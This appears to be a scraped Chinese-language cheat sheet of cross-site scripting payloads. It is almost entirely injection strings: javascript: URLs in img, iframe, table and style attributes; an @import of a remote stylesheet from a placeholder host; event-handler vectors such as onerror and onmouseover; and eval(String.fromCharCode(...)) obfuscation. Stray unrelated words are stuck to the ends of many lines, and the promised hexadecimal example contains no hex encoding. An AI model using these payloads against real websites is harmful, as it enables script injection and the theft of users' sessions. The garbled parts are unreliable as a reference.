第一類:javascript
<img src=javascript:alert() />css
<iframe src=javascript:alert()></iframe>java
<script src=javascript:alert()></script>xss
第二類:網站
<div style=background-image:url(javascript:alert())>url
<img style=background-image:url(javascript:alert())>seo
<b style=background-image:url(javascript:alert())>圖片
用STYLE標籤引用其餘網站上的css文件ip
<STYLE>@import'http://xxx.xom/xss.css';</STYLE>iframe
css文件裏包含跨站程序
body{
background-image:url('javascript:alert();');
}
第三類:
<table background=javascript:alert()></table>
<body background=javascript:alert()></body>
第四類:
<div onmouseenter=alert()>鼠標進入本區域執行Javascript</div>
<div onmouseleave=alert()>鼠標離開本區域執行Javascript</div>
<div onmousewheel=alert()>鼠標在選區滾輪時執行Javascript</div>
<div contentEditable="true" onfocusin=alert()>得到焦點執行Javascript</div>
<div contentEditable="true" onfocusout=alert()>失去焦點執行Javascript</div>
<marquee onstart=alert()>每次顯示滾動內容執行Javascript</marquee>
<img src="" onerror=alert('加載圖片錯誤執行代碼')>
<img src="" onclick=alert('單擊圖片執行代碼')>
<img onmouseover=alert('鼠標通過圖片執行代碼')>
<img style=background-image:url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,41)))>
將要執行的代碼「alert()」轉換爲十進制的ASCII碼,其間用逗號隔開,再用String.fromCharCode解碼,最後用eval執行
還能夠進行十六進制的處理:
<img style=background-image:url(javascript:alert()>